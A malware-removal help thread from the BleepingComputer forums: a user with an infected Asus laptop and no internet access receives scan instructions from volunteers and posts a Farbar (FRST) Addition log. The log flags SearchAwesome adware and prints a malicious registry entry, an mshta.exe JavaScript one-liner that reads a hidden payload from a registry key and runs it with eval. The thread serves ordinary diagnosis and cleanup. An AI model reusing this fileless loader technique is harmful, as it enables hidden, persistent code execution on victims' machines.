Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Help , Need to get virus out my laptop


  • This topic is locked This topic is locked
137 replies to this topic

#1 danban

danban

  • Members
  • 119 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bronx New York
  • Local time:08:03 AM

Posted 30 May 2018 - 02:14 PM

Hello , 

My name is Daniel.

My Asus laptop got infected with a virus.

I managed to stop it in time and it seems it did'nt do damage to my computer which is working properly

but I can't get acess to the internet.

All Wi-Fi and internet connections are blocked.

I tried fixing the settings and that did't work.

 

I do have free versions of Rouge Killer , Rkill , Bitdefender and Malawarebytes

on my computer and have used them succesfully in the past to clean out virus.

The problem is to use all those programs , it has to acess permission to the site and internet ,

and I'm locked out.

 

If anybody knows how to get around this problem I would appreaciate it.

 

I'm typing this on this forum board using another computer , so I'll keep checking for answers here.

 

Dan

 



BC AdBot (Login to Remove)

 


#2 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 37,758 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:05:03 AM

Posted 30 May 2018 - 09:27 PM

Greetings Dan and :welcome: to BleepingComputer's Virus/Trojan/Spyware/Malware Removal forum.

My name is Oh My! and I am here to help you! Now that we are "friends" please call me Gary.

===================================================

Ground Rules:

  • First, I would like to inform you that most of us here at Bleeping Computer offer our expert assistance out of the goodness of our hearts. Please try to match our commitment to you with your patience toward us. If this was easy we would never have met.
  • Please do not run any tools or take any steps other than those I will provide for you while we work on your computer together. I need to be certain about the state of your computer in order to provide appropriate and effective steps for you to take. Most often "well intentioned" (and usually panic driven!) independent efforts can make things much worse for both of us. If at any point you would prefer to take your own steps please let me know, I will not be offended. I would be happy to focus on the many others who are waiting in line for assistance.
  • Please perform all steps in the order they are listed in each set of instructions. Some steps may be a bit complicated. If things are not clear, be sure to stop and let me know. We need to work on this together with confidence.
  • Please copy and paste all logs into your post unless directed otherwise. Please do not re-run any programs I suggest. If you encounter problems simply stop and tell me.
  • If you do not reply to your topic after 5 days we assume it has been abandoned and I will close it.
  • When your computer is clean I will alert you of such. I will also provide for you detailed information about how you can combat future infections.
  • I would like to remind you to make no further changes to your computer unless I direct you to do so.

===================================================

Now that I am assisting you, you can expect that I will be very responsive to your situation. If you are able, I would request you check this thread at least once per day so that we can try to resolve your issues effectively and efficiently. If you are going to be delayed please be considerate and post that information so that I know you are still with me. Unfortunately, there are many people waiting to be assisted and not enough of us at BleepingComputer to go around. I appreciate your understanding and diligence.

Thank you for your patience thus far.

Please do this. If necessary, download the below program onto a USB device from a clean computer and transfer it over to the infected computer's Desktop.

===================================================

Farbar Recovery Scan Tool (FRST)

--------------------

  • Download Farbar Recover Scan Tool for either 32 bit or 64 bit systems and save it to your Desktop. <<< Important
  • Right click on the icon and select Run as administrator
  • Click Yes to the disclaimer
  • Click Scan and allow the program to run
  • Click OK on the Scan complete screen, then OK on the Addition.txt pop up screen
  • 2 Notepad documents should now be open on your desktop.
  • Please copy and paste the contents of each report in separate reply windows

===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it. :thumbsup2:

  • FRST results
  • Addition log

Edited by Oh My!, 30 May 2018 - 09:28 PM.

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#3 RayS

RayS

  • Malware Response Team
  • 2,414 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:08:03 AM

Posted 30 May 2018 - 09:58 PM

Hi danban,

 

My name is Ray and I will be working with Gary. Please copy and paste FRST.txt and Addition.txt into the body of your reply as requested.

 

Thank you,

 

Ray


I don't accept payment for my help, but it would please me if you perform a kindness for your neighbor. You might also contact your local animal shelter. They can always use a bag of kibble or a few cans of pet food. Who knows... you might even find a life-long furry friend there.


#4 danban

danban
  • Topic Starter

  • Members
  • 119 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bronx New York
  • Local time:08:03 AM

Posted 31 May 2018 - 11:06 AM

Hello Ray & Gary.

Thanks for the reply.

 

I've been on here before in the past and and had people fix my past problems.

I'm typing this on another computer in this forum , 

and the computer is far from location from my laptop that has virus.

So expect a 1 day delay for each repond back with txt and info to your directions.

 

I'll follow the steps you gave me and work on it tonight ,

and get back to you tomorrow.

 

Best ,

Dan



#5 RayS

RayS

  • Malware Response Team
  • 2,414 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:08:03 AM

Posted 31 May 2018 - 03:45 PM

Hi Dan,

 

Thank you for keeping me updated.

 

Ray


I don't accept payment for my help, but it would please me if you perform a kindness for your neighbor. You might also contact your local animal shelter. They can always use a bag of kibble or a few cans of pet food. Who knows... you might even find a life-long furry friend there.


#6 danban

danban
  • Topic Starter

  • Members
  • 119 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bronx New York
  • Local time:08:03 AM

Posted 01 June 2018 - 11:22 AM

Hi ,
I did the scan with Fabar recovery tool and here are the Addtion Txt -


Addition Additional scan result of Farbar Recovery Scan Tool (x64) Version: 16.05.2018 01
Ran by Dan (31-05-2018 20:50:32)
Running from C:\Users\Dan\Desktop
Windows 8.1 Connected (Update) (X64) (2015-01-30 09:55:12)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1066246007-1091995785-1061003623-500 - Administrator - Disabled)
Dan (S-1-5-21-1066246007-1091995785-1061003623-1001 - Administrator - Enabled) => C:\Users\Dan
Guest (S-1-5-21-1066246007-1091995785-1061003623-501 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Bitdefender Antivirus Free Edition (Disabled - Up to date) {3FB17364-4FCC-0FA7-6BBF-973897395371}
AS: Bitdefender Antivirus Free Edition (Disabled - Up to date) {84D09280-69F6-0029-510F-AC4AECBE19CC}
AS: Comodo Defense+ (Disabled - Up to date) {6BAD9487-8DE8-D130-293E-C6A728B4104F}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: COMODO Firewall (Disabled) {E8F7F446-E1BD-DFE6-38D1-54E0ADE01D89}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

4K Video Downloader 4.4 (HKLM-x32\...\{CAB406EC-AF92-417D-9BBB-B2ECE1BC7BA6}) (Version: 4.4.2.2255 - Open Media LLC)
7-Zip (HKLM\...\{F43D5365-6E1C-4A2B-BE51-E16D9554FB1D}) (Version: 9.2.0 - 7-Zip) Hidden
7-Zip (HKLM-x32\...\7-Zip 9.2.0) (Version: 9.2.0 - 7-Zip)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 18.011.20038 - Adobe Systems Incorporated)
Adobe After Effects CC 2015.3 (HKLM-x32\...\AEFT_13_8_0) (Version: 13.8.0 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.8.0.310 - Adobe Systems Incorporated)
Adobe Media Encoder CC 2015.3 (HKLM-x32\...\AME_10_3_0) (Version: 10.3.0 - Adobe Systems Incorporated)
Adobe Premiere Pro CC 2015 (HKLM-x32\...\{38C72D42-0672-43B1-9E05-E7631684F9A1}) (Version: 9.0.0 - Adobe Systems Incorporated)
Aeon (HKLM-x32\...\Aeon) (Version: 3.7.4 - SoundSpectrum)
Andy OS (HKLM\...\Andy OS) (Version: 0.45.5.0 - Andy OS, Inc)
Apple Application Support (HKLM-x32\...\{5D09C772-ECB3-442B-9CC6-B4341C78FDC2}) (Version: 2.3.4 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Applian Director (HKLM-x32\...\Applian Director3.01) (Version: 3.01 - Applian Technologies Inc.)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.12 - Michael Tippach)
ASUS Live Update (HKLM-x32\...\{FA540E67-095C-4A1B-97BA-4D547DEC9AF4}) (Version: 3.2.8 - ASUS)
ASUS Screen Saver (HKLM-x32\...\{0FBEEDF8-30FA-4FA3-B31F-C9C7E7E8DFA2}) (Version: 1.0.3 - ASUS)
ASUS Smart Gesture (HKLM-x32\...\{4D3286A6-F6AB-498A-82A4-E4F040529F3D}) (Version: 2.2.14 - ASUS)
ASUS Splendid Video Enhancement Technology (HKLM-x32\...\{0969AF05-4FF6-4C00-9406-43599238DE0D}) (Version: 2.01.0021 - ASUS)
ASUSDVD (HKLM-x32\...\{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.5712.52 - CyberLink Corp.) Hidden
ASUSDVD (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.5712.52 - CyberLink Corp.)
AsusVibe2.0 (HKLM-x32\...\Asus Vibe2.0) (Version: 2.0.12.311 - ASUSTEK)
AVS Audio Converter 8.1.1 (HKLM-x32\...\AVS Audio Converter_is1) (Version: 8.1.1.549 - Online Media Technologies Ltd.)
AVS Audio Editor 8.1.1 (HKLM-x32\...\AVS Audio Editor_is1) (Version: 8.1.1.506 - Online Media Technologies Ltd.)
AVS Disc Creator 5.2.5 (HKLM-x32\...\AVS Disc Creator_is1) (Version: 5.2.5.536 - Online Media Technologies Ltd.)
AVS Document Converter 3.0.2 (HKLM-x32\...\AVS Document Converter_is1) (Version: 3.0.2.238 - Online Media Technologies Ltd.)
AVS Image Converter 4.0.2 (HKLM-x32\...\AVS Image Converter_is1) (Version: 4.0.2.281 - Online Media Technologies Ltd.)
AVS Media Player 4.3.1 (HKLM-x32\...\AVS Media Player_is1) (Version: 4.3.1.114 - Online Media Technologies Ltd.)
AVS Photo Editor 2.3.4 (HKLM-x32\...\AVS Photo Editor_is1) (Version: 2.3.4.148 - Online Media Technologies Ltd.)
AVS Registry Cleaner 3.0.3 (HKLM-x32\...\AVS Registry Cleaner_is1) (Version: 3.0.3.272 - Online Media Technologies Ltd.)
AVS Video Converter 9.2.1 (HKLM-x32\...\AVS4YOU Video Converter 7_is1) (Version: 9.2.1.579 - Online Media Technologies Ltd.)
AVS Video Editor 7.2.1 (HKLM-x32\...\AVS Video Editor_is1) (Version: 7.2.1.269 - Online Media Technologies Ltd.)
AVS Video ReMaker 5.0.2 (HKLM-x32\...\AVS Video ReMaker_is1) (Version: 5.0.2.175 - Online Media Technologies Ltd.)
Bandicam (HKLM-x32\...\Bandicam) (Version: 3.0.4.1036 - Bandisoft.com)
Bandicut (HKLM-x32\...\Bandicut) (Version: 1.2.7.132 - Bandisoft.com)
Bandisoft MPEG-1 Decoder (HKLM-x32\...\BandiMPEG1) (Version: - Bandisoft.com)
Beta Bugs FloFi VST (HKLM-x32\...\FloFi) (Version: "1.1.0" - "BetaBugs")
Beta Bugs Moneo VST (HKLM-x32\...\Moneo) (Version: "1.0.0" - "BetaBugs")
Beta Bugs WideBug VST (HKLM-x32\...\WideBug) (Version: "1.0.0" - "BetaBugs")
Bitdefender Antivirus Free Edition (HKLM\...\BitDefender Gonzales) (Version: 1.0.21.1109 - Bitdefender)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.15 - Piriform)
COMODO Firewall (HKLM\...\{1EBC6C6F-7D31-4897-B241-DC7052F3E7A5}) (Version: 8.2.0.5027 - COMODO Security Solutions Inc.)
CrazyTalk Animator v2.0 Pipeline (HKLM-x32\...\{7127D4CC-78E6-41E3-8BCB-A50ED34846E2}) (Version: 2.0.1214.1 - Reallusion Inc.)
CrazyTalk v7.32 Standard (HKLM-x32\...\{27C4EA98-84A3-4CDF-A436-F984A0283357}) (Version: 7.32.3114.1 - Reallusion Inc.)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
DaVinci Resolve (HKLM\...\{9B4515CC-A703-49D2-85E6-5348CA30534D}) (Version: 12.5.0032 - Blackmagic Design)
DS-MP3 Source 1.30 (HKLM-x32\...\DS-MP3 Source) (Version: - )
Eusing Free MP3 Cutter (HKLM-x32\...\Eusing Free MP3 Cutter) (Version: - )
FaceGen Artist Demo (HKLM-x32\...\{280BB5D8-30DC-4D62-B4D5-A3C19BB30479}) (Version: 1.10.0.0 - Singular Inversions Inc.)
FaceGen Artist Pro (HKLM-x32\...\{F6F73B62-D4E0-46B0-BD1C-3F4F55B107D8}) (Version: 1.10.0.0 - Singular Inversions Inc.)
Flvto Youtube Downloader (HKLM-x32\...\Flvto Youtube Downloader) (Version: 0.6.9 - Hotger)
FrostWire 6.0.8 (HKLM-x32\...\FrostWire 6) (Version: 6.0.8.1 - FrostWire LLC)
Gadwin PrintScreen (64-Bit) (HKLM\...\{819A52E1-0929-469A-BEB6-1AEBE0873CFC}) (Version: 5.4.2.0 - Gadwin Systems)
GIMP 2.8.16 (HKLM\...\GIMP-2_is1) (Version: 2.8.16 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 65.0.3325.181 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.7 - Google Inc.) Hidden
Gramblr (HKLM\...\Gramblr) (Version: 2.9.127 - Gramblr Team)
GROOVE 5.6.3 Pro Edition (HKLM\...\{21D8E7FE-7FE7-46B3-B578-22E1ABC5E407}) (Version: 5.6.3 - Gemini)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3355 - Intel Corporation)
Intel® Sideband Fabric Device Driver (HKLM-x32\...\C5A8BC6E-723A-4C0F-96E1-C426D1A4BCA9) (Version: 1.0.0.1002 - Intel Corporation)
Intel® Trusted Execution Engine (HKLM\...\{176E2755-0A17-42C6-88E2-192AB2131278}) (Version: 1.0.0.1064 - Intel Corporation)
ISSE version 0.2.0 (HKLM\...\{9330BAEC-6E26-4C5B-93A1-8BDD9ACF231B}_is1) (Version: 0.2.0 - CCRMA, Stanford University)
ivsEdits Free Edition (HKLM-x32\...\ivsEdits Free Edition) (Version: - )
Java 8 Update 73 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218073F0}) (Version: 8.0.730.2 - Oracle Corporation)
JBridge (HKLM-x32\...\JBridge) (Version: - JBridge)
Junk Mail filter update (HKLM-x32\...\{0BE9E708-5DC0-4963-9CFD-0AA519090E79}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
KRISTAL Audio Engine (HKLM-x32\...\KRISTAL Audio Engine) (Version: - )
Lightworks (HKLM-x32\...\{E94DD4E4-7746-472c-AA7B-1242FED0CFC8}) (Version: 12.6.0.0 - Lightworks)
LUXONIX LFX-1310 (HKLM-x32\...\LUXONIX_LFX-1310) (Version: 1.4 - LUXONIX)
MakeMKV v1.9.1 (HKLM-x32\...\MakeMKV) (Version: v1.9.1 - GuinpinSoft inc)
Massey Plugins Demos [Remove only] (HKLM-x32\...\Massey Plugins Demos) (Version: - )
MediaShuttlePlugin-v5.4 (HKLM-x32\...\{BA567CFA-F158-44C3-AA40-1773478BD477}) (Version: 5.4.4.71844 - Signiant Inc.)
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\OneDriveSetup.exe) (Version: 18.025.0204.0009 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23918 (HKLM-x32\...\{dab68466-3a7d-41a8-a5cf-415e3ff8ef71}) (Version: 14.0.23918.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Movavi Video Editor 11 (HKLM-x32\...\Movavi Video Editor 11) (Version: 11.4.1 - Movavi)
Movavi Video Suite 12 (HKLM-x32\...\Movavi Video Suite 12) (Version: 12.0.0 - Movavi)
Movie Maker (HKLM-x32\...\{38F03569-A636-4CF3-BDDE-032C8C251304}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{DD67BE4B-7E62-4215-AFA3-F123A800A389}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 55.0.3 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 55.0.3 (x86 en-US)) (Version: 55.0.3 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 54.0 - Mozilla)
mp3splt-gtk (HKLM-x32\...\mp3splt-gtk) (Version: - )
Muvizu:Play - Heroes and villains (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuHeroesAndVillains) (Version: - Digimania Ltd)
Muvizu:Play - Heroes and villains Lairs (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuHeroAndVillainLairs) (Version: - Digimania Ltd)
Muvizu:Play - Lighting Presets (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuLightingPresets) (Version: - Digimania Ltd)
Muvizu:Play - Mandy Content (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuMandyContentPack) (Version: - Digimania Ltd)
Muvizu:Play - Prisons (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuPrisons) (Version: - Digimania Ltd)
Muvizu:Play - Rosie (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuRosie) (Version: - Digimania Ltd)
Muvizu:Play - Trains (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuTrains) (Version: - Digimania Ltd)
Muvizu:Play (HKLM-x32\...\Muvizu) (Version: 2015.08.20.01R - Digimania Ltd)
ocenaudio (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\ocenaudio) (Version: 2.0.14 - ocenaudio Team)
PitchWorks remove (HKLM-x32\...\PitchWorks DX) (Version: - )
PrimoPDF -- brought to you by Nitro PDF Software (HKLM-x32\...\PrimoPDF) (Version: 5 - Nitro PDF Software)
Qualcomm Atheros Client Installation Program (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 10.0 - Qualcomm Atheros)
QuickTime (HKLM-x32\...\{B67BAFBA-4C9F-48FA-9496-933E3B255044}) (Version: 7.74.80.86 - Apple Inc.)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.2.9200.27040 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.20.815.2013 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7213 - Realtek Semiconductor Corp.)
Recuva (HKLM\...\Recuva) (Version: 1.52 - Piriform)
Replay Media Catcher 5 (5.0.1.54) (HKLM-x32\...\Replay Media Catcher 5) (Version: 5.0.1.54 - Applian Technologies)
Replay Video Capture 7 (HKLM-x32\...\Replay Video Capture7.4) (Version: 7.4 - Applian Technologies Inc.)
SearchAwesome (HKLM\...\6320c4d4d9492959f6f8b43b8fdbf2f5) (Version: 13.14.1.204 (i1.0) - SearchAwesome) <==== ATTENTION
ShapeShop B5 (HKLM-x32\...\ShapeShop) (Version: - )
Skype™ 7.33 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.33.105 - Skype Technologies S.A.)
SMPlayer 16.6.0 (HKLM-x32\...\SMPlayer) (Version: 16.6.0 - Ricardo Villalba)
Softube Plug-Ins (VST AAX 32-bit) (HKLM-x32\...\Softube Plug-Ins (VST AAX 32-bit)) (Version: 2.2.91 - Softube AB)
Synfig Studio (HKLM-x32\...\synfigstudio) (Version: 1.0.2 - )
Total Recorder 8.5 Standard Edition (HKLM-x32\...\TotalRecorder) (Version: - )
Tupi version 0.2-4 (HKLM-x32\...\Tupi_is1) (Version: 0.2-4 - )
Tweaking.com - Windows Repair (HKLM-x32\...\Tweaking.com - Windows Repair) (Version: 3.8.3 - Tweaking.com)
Update Installer for WildTangent Games App (HKLM-x32\...\{2FA94A64-C84E-49d1-97DD-7BF06C7BBFB2}.WildTangent Games App) (Version: - WildTangent) Hidden
Virtual Magnifying Glass v3.6 (HKLM-x32\...\Virtual Magnifying Glass_is1) (Version: - )
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
VMware Player (HKLM\...\{E452E727-86B8-4233-8CC3-41FD817AFAFF}) (Version: 6.0.7 - VMware, Inc.) Hidden
VMware VIX (HKLM-x32\...\{F99FC179-EA67-4BBC-8955-BDDA0CB94B88}) (Version: 1.13.7.62285 - VMware, Inc.)
WD My Cloud (HKLM\...\{3082756C-2147-411F-AE6A-9DCEF0121903}) (Version: 1.0.7.5 - Western Digital Technologies, Inc.)
WebStorage (HKLM-x32\...\WebStorage) (Version: 2.1.2.301 - ASUS Cloud Corporation)
WhiteCap (HKLM-x32\...\WhiteCap) (Version: 5.0.5 - SoundSpectrum)
WildTangent Games App (HKLM-x32\...\{70B446D1-E03B-4ab0-9B3C-0832142C9AA8}.WildTangent Games App-asus) (Version: 4.0.11.2 - WildTangent)
Winamp (HKLM-x32\...\Winamp) (Version: 5.666 - Nullsoft, Inc)
Windows Driver Package - ASUS (ATP) Mouse (03/17/2014 1.0.0.207) (HKLM\...\AA2CC56D4BBEE037DC99871F5F6551133D2A0CC3) (Version: 03/17/2014 1.0.0.207 - ASUS)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
Windows Media Encoder 9 Series (HKLM-x32\...\Windows Media Encoder 9) (Version: - )
WinFlash (HKLM-x32\...\{8F21291E-0444-4B1D-B9F9-4370A73E346D}) (Version: 2.42.0 - ASUS)
WinPcap 4.1.3 (HKLM-x32\...\WinPcapInst) (Version: 4.1.0.2980 - Riverbed Technology, Inc.)
WinRAR 5.31 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH)
WinX DVD Ripper Platinum 7.5.18 (HKLM-x32\...\WinX DVD Ripper Platinum_is1) (Version: - Digiarty Software, Inc.)
WonderFox DVD Ripper Speedy 8.1 (HKLM-x32\...\WonderFox DVD Ripper Speedy) (Version: 8.1 - WonderFox Soft, Inc.)
WonderFox DVD Video Converter 10.0 (HKLM-x32\...\WonderFox DVD Video Converter) (Version: 10.0 - WonderFox Soft, Inc.)
Yahoo! Toolbar (HKLM-x32\...\Yahoo! Companion) (Version: - Yahoo! Inc.)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\ChromeHTML: -> <==== ATTENTION
CustomCLSID: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001_Classes\CLSID\{162C6FB5-44D3-435B-903D-E613FA093FB5}\InprocServer32 -> C:\Users\Dan\AppData\Local\Microsoft\OneDrive\17.3.6998.0830\amd64\FileCoAuthLib64.dll => No File
CustomCLSID: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\Software\Classes\f2e8449: "C:\Windows\system32\mshta.exe" "javascript:TOWG9H8n="9fTue2";F6q=new ActiveXObject("WScript.Shell");yYl78Ye="OOPGIb";j0tdG8=F6q.RegRead("HKCU\\software\\wsfl\\nfhvb");CnQ2SRmC="VxncXy";eval(j0tdG8);Cw1zFO6q="2Od3ft0";" <==== ATTENTION
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ShellIconOverlayIdentifiers: [!AsusWSShellExt_B] -> {6D4133E5-0742-4ADC-8A8C-9303440F7191} => C:\Program Files (x86)\Common Files\AWS\2.1.2.301\ASUSWSShellExt64.dll [2013-06-25] (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [!AsusWSShellExt_O] -> {64174815-8D98-4CE6-8646-4C039977D809} => C:\Program Files (x86)\Common Files\AWS\2.1.2.301\ASUSWSShellExt64.dll [2013-06-25] (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [!AsusWSShellExt_U] -> {1C5AB7B1-0B38-4EC4-9093-7FD277E2AF4E} => C:\Program Files (x86)\Common Files\AWS\2.1.2.301\ASUSWSShellExt64.dll [2013-06-25] (ASUS Cloud Corporation.)
ContextMenuHandlers1-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2010-11-18] (Igor Pavlov)
